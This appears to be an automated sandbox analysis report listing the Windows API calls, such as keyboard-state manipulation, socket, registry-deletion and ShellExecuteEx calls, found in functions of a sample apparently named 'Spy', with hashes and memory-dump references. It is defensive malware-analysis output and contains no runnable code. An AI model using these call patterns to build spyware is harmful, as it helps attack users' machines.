                                                      • _memmove.LIBCMT ref: 00AE7739
                                                      • _memmove.LIBCMT ref: 00AE7756
                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00AE7765
                                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00AE777A
                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00AE7799
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                      • String ID:
                                                      • API String ID: 256516436-0
                                                      • Opcode ID: 7c2a62df2035efb46fcbfbec0c8b7a0117a70d965d64506763429f07c092ec44
                                                      • Instruction ID: 3bf67c0d34d6f6479d4db5ce4b55592956af568e5cf00c41f9fef05cc2165737
                                                      • Opcode Fuzzy Hash: 7c2a62df2035efb46fcbfbec0c8b7a0117a70d965d64506763429f07c092ec44
                                                      • Instruction Fuzzy Hash: B2317031904109EBDB10EF55DD85EAEB7B8EF45310F1480A5FD04AB296DB709A50DBA0
                                                      APIs
                                                      • DeleteObject.GDI32(00000000), ref: 00B06810
                                                      • GetDC.USER32(00000000), ref: 00B06818
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B06823
                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00B0682F
                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00B0686B
                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00B0687C
                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00B0964F,?,?,000000FF,00000000,?,000000FF,?), ref: 00B068B6
                                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00B068D6
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                      • String ID:
                                                      • API String ID: 3864802216-0
                                                      • Opcode ID: 95e64ef3e6d13a8adea04e6fe76b17d24e84fbed7e78438bdcb79920428f4df2
                                                      • Instruction ID: e5159c08e437ece4382a43e98e89b1cb483fecbe86cf945c7649b11870b0d12f
                                                      • Opcode Fuzzy Hash: 95e64ef3e6d13a8adea04e6fe76b17d24e84fbed7e78438bdcb79920428f4df2
                                                      • Instruction Fuzzy Hash: 9D316D72111214BFEB119F50DC4AFEA3FADEB49761F048055FE089A291DAB59C91CB70
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: _memcmp
                                                      • String ID:
                                                      • API String ID: 2931989736-0
                                                      • Opcode ID: b3a1438c5efa031ca217f2d57e6f4286070f8be7144a735a27f04a009277b87d
                                                      • Instruction ID: 957bb56d10170c1cac9a48ee0cd38c1672726e4e3e55eb0c6012eb78222b62e6
                                                      • Opcode Fuzzy Hash: b3a1438c5efa031ca217f2d57e6f4286070f8be7144a735a27f04a009277b87d
                                                      • Instruction Fuzzy Hash: 0F219572A452077ADA0476119E82FEF37AC9E25BA4F844026FD07E7382F710DE11CAE1
                                                      APIs
                                                        • Part of subcall function 00A84D37: __itow.LIBCMT ref: 00A84D62
                                                        • Part of subcall function 00A84D37: __swprintf.LIBCMT ref: 00A84DAC
                                                        • Part of subcall function 00A9436A: _wcscpy.LIBCMT ref: 00A9438D
                                                      • _wcstok.LIBCMT ref: 00AEF2D7
                                                      • _wcscpy.LIBCMT ref: 00AEF366
                                                      • _memset.LIBCMT ref: 00AEF399
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                      • String ID: X
                                                      • API String ID: 774024439-3081909835
                                                      • Opcode ID: 644a7855fd8e927694ab25af6000970ac039a2bffd9b1e90327413d77330c668
                                                      • Instruction ID: 5afa96b13c3df5ceac7b70ed6da994eae5d0774d9b0659143b51b44efa15fede
                                                      • Opcode Fuzzy Hash: 644a7855fd8e927694ab25af6000970ac039a2bffd9b1e90327413d77330c668
                                                      • Instruction Fuzzy Hash: 42C18E716043819FCB14EF65C981A5EB7E4FF85354F10492DF8999B2A2EB30EC45CB92
                                                      APIs
                                                      • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00AF72EB
                                                      • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00AF730C
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00AF731F
                                                      • htons.WSOCK32(?,?,?,00000000,?), ref: 00AF73D5
                                                      • inet_ntoa.WSOCK32(?), ref: 00AF7392
                                                        • Part of subcall function 00ADB4EA: _strlen.LIBCMT ref: 00ADB4F4
                                                        • Part of subcall function 00ADB4EA: _memmove.LIBCMT ref: 00ADB516
                                                      • _strlen.LIBCMT ref: 00AF742F
                                                      • _memmove.LIBCMT ref: 00AF7498
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                      • String ID:
                                                      • API String ID: 3619996494-0
                                                      • Opcode ID: ddeb6334e474a349d204e9b9439b4e2268962c206db49b7029cb215a504476a9
                                                      • Instruction ID: d45b2b325cad129298305a29692576b714c812b917817812c0b3bb2f86cd9905
                                                      • Opcode Fuzzy Hash: ddeb6334e474a349d204e9b9439b4e2268962c206db49b7029cb215a504476a9
                                                      • Instruction Fuzzy Hash: 7981C271608205AFD710EB64CD81E6FB7F8AF88714F10451DFA569B292EB70DD41CB91
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 133ced0a70d2226a8065cc1bec4843ce614177a38e8162c5824fd45b982a6be0
                                                      • Instruction ID: 094cccb365fe8f95e8811e0b73512f6aa0108fc66aa31d2350ecfbf7abd0b3e1
                                                      • Opcode Fuzzy Hash: 133ced0a70d2226a8065cc1bec4843ce614177a38e8162c5824fd45b982a6be0
                                                      • Instruction Fuzzy Hash: 81713A70900109EFDB14AF98CC89AEEBB79FF86314F148159F915AB251C774AA52CFA0
                                                      APIs
                                                      • IsWindow.USER32(013954F8), ref: 00B0BA5D
                                                      • IsWindowEnabled.USER32(013954F8), ref: 00B0BA69
                                                      • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00B0BB4D
                                                      • SendMessageW.USER32(013954F8,000000B0,?,?), ref: 00B0BB84
                                                      • IsDlgButtonChecked.USER32(?,?), ref: 00B0BBC1
                                                      • GetWindowLongW.USER32(013954F8,000000EC), ref: 00B0BBE3
                                                      • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00B0BBFB
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                      • String ID:
                                                      • API String ID: 4072528602-0
                                                      • Opcode ID: 3c9b6bf54d13fed9768dd51d5268253b0e5dc086b443155a61ce16e62240101e
                                                      • Instruction ID: dca0ec57f2914aa7e3c9da45bc7f42d5ffc65421e54befcd167637ae85a8555d
                                                      • Opcode Fuzzy Hash: 3c9b6bf54d13fed9768dd51d5268253b0e5dc086b443155a61ce16e62240101e
                                                      • Instruction Fuzzy Hash: E9718A34A04204AFEB259F54C8D4FBABFE9EF49310F144499E986972A1CF31AD51DB60
                                                      APIs
                                                      • _memset.LIBCMT ref: 00AFFB31
                                                      • _memset.LIBCMT ref: 00AFFBFA
                                                      • ShellExecuteExW.SHELL32(?), ref: 00AFFC3F
                                                        • Part of subcall function 00A84D37: __itow.LIBCMT ref: 00A84D62
                                                        • Part of subcall function 00A84D37: __swprintf.LIBCMT ref: 00A84DAC
                                                        • Part of subcall function 00A9436A: _wcscpy.LIBCMT ref: 00A9438D
                                                      • GetProcessId.KERNEL32(00000000), ref: 00AFFCB6
                                                      • CloseHandle.KERNEL32(00000000), ref: 00AFFCE5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                      • String ID: @
                                                      • API String ID: 3522835683-2766056989
                                                      • Opcode ID: d596e5244696527b64718365ed00457efe2620db137f6e9499567eedbc8ce6ce
                                                      • Instruction ID: 7d55c32ec960aad94ba153f7678d7674c2fd6cdcf375455589b086a46dfbb608
                                                      • Opcode Fuzzy Hash: d596e5244696527b64718365ed00457efe2620db137f6e9499567eedbc8ce6ce
                                                      • Instruction Fuzzy Hash: 9761BE75A00619DFCB14EFA4C5919AEB7F4FF48310F148569E916AB351DB30AD42CB90
                                                      APIs
                                                      • GetParent.USER32(?), ref: 00AE178B
                                                      • GetKeyboardState.USER32(?), ref: 00AE17A0
                                                      • SetKeyboardState.USER32(?), ref: 00AE1801
                                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 00AE182F
                                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 00AE184E
                                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00AE1894
                                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00AE18B7
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: MessagePost$KeyboardState$Parent
                                                      • String ID:
                                                      • API String ID: 87235514-0
                                                      • Opcode ID: 9a0a24f6b9f4c303d799c208671b3b69e6621b94cd0f04bf83045a9479727de7
                                                      • Instruction ID: 82ee237d462e5f9c117b7dd50a39d8cc1a502e0039d28e3e07e8c2d626395c81
                                                      • Opcode Fuzzy Hash: 9a0a24f6b9f4c303d799c208671b3b69e6621b94cd0f04bf83045a9479727de7
                                                      • Instruction Fuzzy Hash: 5851C3B0A187E53EFB364326CC55BBA7EE96B06700F088589E0D9468C3D6F89CD4DB50
                                                      APIs
                                                      • GetParent.USER32(00000000), ref: 00AE15A4
                                                      • GetKeyboardState.USER32(?), ref: 00AE15B9
                                                      • SetKeyboardState.USER32(?), ref: 00AE161A
                                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00AE1646
                                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00AE1663
                                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00AE16A7
                                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00AE16C8
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: MessagePost$KeyboardState$Parent
                                                      • String ID:
                                                      • API String ID: 87235514-0
                                                      • Opcode ID: a170a9779a71585a42df9f7fb55414ea3857ba3f189fd33091bb17faad572855
                                                      • Instruction ID: d1e6e92d03ea65ae16656274c05b6e019b4381e2969852d15b7fb6b8f93f4b78
                                                      • Opcode Fuzzy Hash: a170a9779a71585a42df9f7fb55414ea3857ba3f189fd33091bb17faad572855
                                                      • Instruction Fuzzy Hash: 7351E7B06047E53DFB328726CC55BBABEA96B05300F0C8589E1D9578C2D6B4EC98E761
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: _wcsncpy$LocalTime
                                                      • String ID:
                                                      • API String ID: 2945705084-0
                                                      • Opcode ID: d4484eae971f9d47439048779801d3b274a30f6c3f6fef9c30caaa00493da6f4
                                                      • Instruction ID: 5ecdc1792afdb0b0ad334896bdd4bc471586927c894a9e02b3898816d310f502
                                                      • Opcode Fuzzy Hash: d4484eae971f9d47439048779801d3b274a30f6c3f6fef9c30caaa00493da6f4
                                                      • Instruction Fuzzy Hash: 3841D366C2065875CF51FBB5CC86ACFB7B8AF06310F508856F509E3161E734A359C3A5
                                                      APIs
                                                        • Part of subcall function 00AE4BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00AE3B8A,?), ref: 00AE4BE0
                                                        • Part of subcall function 00AE4BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00AE3B8A,?), ref: 00AE4BF9
                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00AE3BAA
                                                      • _wcscmp.LIBCMT ref: 00AE3BC6
                                                      • MoveFileW.KERNEL32(?,?), ref: 00AE3BDE
                                                      • _wcscat.LIBCMT ref: 00AE3C26
                                                      • SHFileOperationW.SHELL32(?), ref: 00AE3C92
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                      • String ID: \*.*
                                                      • API String ID: 1377345388-1173974218
                                                      • Opcode ID: a91f74432880cc379a2ed7bb8f3d47bd595dd97d253584667238e9d3b190c608
                                                      • Instruction ID: 126a767007aa4ef79743f36ac13fc95b85d07c8bc67a1ac0346c90293efd02bf
                                                      • Opcode Fuzzy Hash: a91f74432880cc379a2ed7bb8f3d47bd595dd97d253584667238e9d3b190c608
                                                      • Instruction Fuzzy Hash: 72418F7250C3849ACB52EF65C585ADFB7ECAF89340F50092EF48AC7191EB34D688C752
                                                      APIs
                                                      • _memset.LIBCMT ref: 00B078CF
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B07976
                                                      • IsMenu.USER32(?), ref: 00B0798E
                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00B079D6
                                                      • DrawMenuBar.USER32 ref: 00B079E9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Menu$Item$DrawInfoInsert_memset
                                                      • String ID: 0
                                                      • API String ID: 3866635326-4108050209
                                                      • Opcode ID: 3ee29b26f73b4948beff5d21c846ceeeb4d1e520bb34f84bb300c263659d1a20
                                                      • Instruction ID: d738b440c664465b0d2ce0818ac95067d8970cc8e6318d280d534dbc6606a22e
                                                      • Opcode Fuzzy Hash: 3ee29b26f73b4948beff5d21c846ceeeb4d1e520bb34f84bb300c263659d1a20
                                                      • Instruction Fuzzy Hash: 2B414975A44209EFDB10DF94D884EAABBFAFB05310F0481A9E95597290CB70AD50CFA0
                                                      APIs
                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00B01631
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B0165B
                                                      • FreeLibrary.KERNEL32(00000000), ref: 00B01712
                                                        • Part of subcall function 00B01602: RegCloseKey.ADVAPI32(?), ref: 00B01678
                                                        • Part of subcall function 00B01602: FreeLibrary.KERNEL32(?), ref: 00B016CA
                                                        • Part of subcall function 00B01602: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00B016ED
                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00B016B5
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                      • String ID:
                                                      • API String ID: 395352322-0
                                                      • Opcode ID: 91b949e569a5935aa1b8e92470421d241d3417ac7d7ecf85b94a461f9c3c4920
                                                      • Instruction ID: 98d70bee05690573226c61b7a28051d8e8029afe79dd37063c728013d617357a
                                                      • Opcode Fuzzy Hash: 91b949e569a5935aa1b8e92470421d241d3417ac7d7ecf85b94a461f9c3c4920
                                                      • Instruction Fuzzy Hash: B7313CB191010DFFDB199F94DC89AFEBBBCEF08300F4045A9F501A2190EA749E859AA0
                                                      APIs
                                                      • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00B06911
                                                      • GetWindowLongW.USER32(013954F8,000000F0), ref: 00B06944
                                                      • GetWindowLongW.USER32(013954F8,000000F0), ref: 00B06979
                                                      • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00B069AB
                                                      • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00B069D5
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00B069E6
                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00B06A00
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: LongWindow$MessageSend
                                                      • String ID:
                                                      • API String ID: 2178440468-0
                                                      • Opcode ID: b3a99c7696e33eacb9a33f1b185668f3fa8ce0364fd4d8ae8875f2c1edf10b62
                                                      • Instruction ID: df985b2d245e2871dba1dbcb3ddb72bd54c058426e39806a46ef632dd293b302
                                                      • Opcode Fuzzy Hash: b3a99c7696e33eacb9a33f1b185668f3fa8ce0364fd4d8ae8875f2c1edf10b62
                                                      • Instruction Fuzzy Hash: BE313234644255AFEB20DF59DC88F643BE1FB4A350F2841A4F5048B6F1CB72ADA0CB91
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00ADE2CA
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00ADE2F0
                                                      • SysAllocString.OLEAUT32(00000000), ref: 00ADE2F3
                                                      • SysAllocString.OLEAUT32(?), ref: 00ADE311
                                                      • SysFreeString.OLEAUT32(?), ref: 00ADE31A
                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00ADE33F
                                                      • SysAllocString.OLEAUT32(?), ref: 00ADE34D
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
